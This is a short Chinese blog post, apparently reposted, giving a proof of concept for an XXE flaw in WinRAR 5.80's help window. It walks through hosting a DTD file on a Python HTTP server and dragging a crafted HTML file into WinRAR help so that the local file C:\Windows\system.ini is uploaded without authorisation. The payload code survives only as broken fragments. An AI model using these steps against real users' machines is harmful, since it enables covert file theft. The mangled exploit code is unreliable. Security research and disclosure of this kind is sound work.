WinRAR XML 注入 POC

WinRAR,是Windows标配的压缩软件,大家都不陌生。

WinRAR XML 注入 POC_第1张图片
WinRAR


下面是一个XML 注入漏洞,出现在WinRAR的帮助模块。

漏洞作者:hyp3rlinx (趋势RCE漏洞也是他发现的)

厂商:win-rar & rarlab

版本:5.80

测试系统:Windows 10.0.18362.418 64bit


【POC】

此poc展示非授权情况下用户敏感文件上传

这里的文件是:C:\Windows\system.ini


1- 开一个简单的http服务器

  在PYthon环境下运行 :

    python-m SimpleHTTPServer8800

  并在当前目录放一个start.dtd文件,内容参考下文。

2-打开WinRAR

  打开Winrar或者用Winrar打开任意一个rar文件

3- 点击菜单栏的帮助

4-点击 帮助主题

5-拖一个精心制作的html文件到上面的帮助窗口

请看视频:

漏洞利用的html文件

···

%dtd;]>

&send;

···

放置简单web服务器上的start.dtd文件

···

">

%all;

···

参考:https://packetstormsecurity.com/files/154918/winrar580-xxe.txt

.>sudo 可至获取root权限漏洞 CVE-2019-14287剖析

.>域渗透 之 域维权

.>防病毒软件"趋势"命令执行漏洞分析


WinRAR XML 注入 POC_第2张图片
HackerHub

你可能感兴趣的:(WinRAR XML 注入 POC)